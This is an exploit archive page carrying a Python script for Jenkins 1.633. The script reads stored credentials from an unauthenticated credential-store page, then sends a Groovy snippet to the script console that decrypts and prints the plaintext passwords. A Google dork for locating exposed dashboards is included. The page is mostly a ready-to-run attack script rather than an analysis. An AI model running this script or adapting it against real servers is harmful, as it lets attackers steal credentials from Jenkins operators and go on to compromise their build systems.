Jenkins 1.633 Credential Disclosure

Jenkins 1.633 Credential Disclosure: Posted Nov 11, 2015; Authored by Th3R3p0; Jenkins version 1.633 suffers from an unauthenticated credential recovery vulnerability.; tags | exploit, info disclosure; SHA-256 | abde370dba2adfff37416fc0dc82c7e6cc006f60a37c64b8f148759a98875b7e; Download | Favorite | View

Jenkins 1.633 Credential Disclosure

# Exploit Title: Jenkins Unauthenticated Credential Recovery
# Disclosure Date: 10/14/2015
# Response Date: 10/14/2015
# Response: "Recommend this be rejected as a vulnerability."
# Full report including response: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html
# Vendor Homepage: https://jenkins-ci.org/
# Tested on: Jenkins v1.633
# Author = 'Th3R3p0' | Justin Massey
# Google Dork: intitle:"Dashboard [Jenkins]" Credentials
 
import requests
import re
from BeautifulSoup import BeautifulSoup
import urllib
 
 
# Usage: Modify the URL below to match the target host and port
#   Must have trailing slash at end of URL
url='http://192.168.1.151:8080/'
 
# makes request to gather all users with stored credentials
r= requests.get(url + 'credential-store/domain/_/')
soup = BeautifulSoup(r.text)
 
# loop to go through all hrefs and match the regex "credential" and add the urls to the users list
users = []
for link in soup.body.findAll('a', href=True):
    m = re.match("credential", link['href'])
    if m:
        if link['href'] not in users:
            users.append(link['href'])
 
for users in users:
    r2 = requests.get(url + 'credential-store/domain/_/'+users+'/update')
    soup2 = BeautifulSoup(r2.text)
 
    # Finds the user and password value in html and stores in encPass variable
    user = soup2.body.findAll(attrs={"name" : "_.username"})[0]['value']
    encPass = soup2.body.findAll(attrs={"name" : "_.password"})[0]['value']
    # Encodes the password to www-form-urlencoded standards needed for the expected content type
    encPassEncoded = urllib.quote(encPass, safe='')
 
    # Script to run in groovy scripting engine to decrypt the password
    script = 'script=hudson.util.Secret.decrypt+%%27' \
             '%s'\
             '%%27&json=%%7B%%22script%%22%%3A+%%22hudson.util.Secret.decrypt+%%27' \
             '%s' \
             '%%27%%22%%2C+%%22%%22%%3A+%%22%%22%%7D&Submit=Run' % (encPassEncoded, encPassEncoded)
 
    # Using sessions because the POST requires a session token to be present
    with requests.Session() as s:
        r3 = s.get(url+'script')
        headers = {'content-type': 'application/x-www-form-urlencoded'}
        r3 = s.post(url+'script',data=script, headers=headers)
    soup3 = BeautifulSoup(r3.text)
 
    # Extracts password from body
    password = soup3.body.findAll('pre')[1].text
    password = re.sub('Result:', '', password)
    print "User: %s | Password:%s" % (user, password)

Top Authors In Last 30 Days

Red Hat 210 files
indoushka 182 files
Ubuntu 93 files
Gentoo 32 files
Debian 18 files
Matthias Deeg 11 files
Chris Beiter 11 files
Frederik Beimgraben 11 files
Apple 10 files
malvuln 8 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,135)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,421)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,936)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,899)
UNIX (9,465)
UnixWare (188)
Windows (6,782)
Other

Jenkins 1.633 Credential Disclosure

Jenkins 1.633 Credential Disclosure

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Jenkins 1.633 Credential Disclosure

Share This

Jenkins 1.633 Credential Disclosure

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems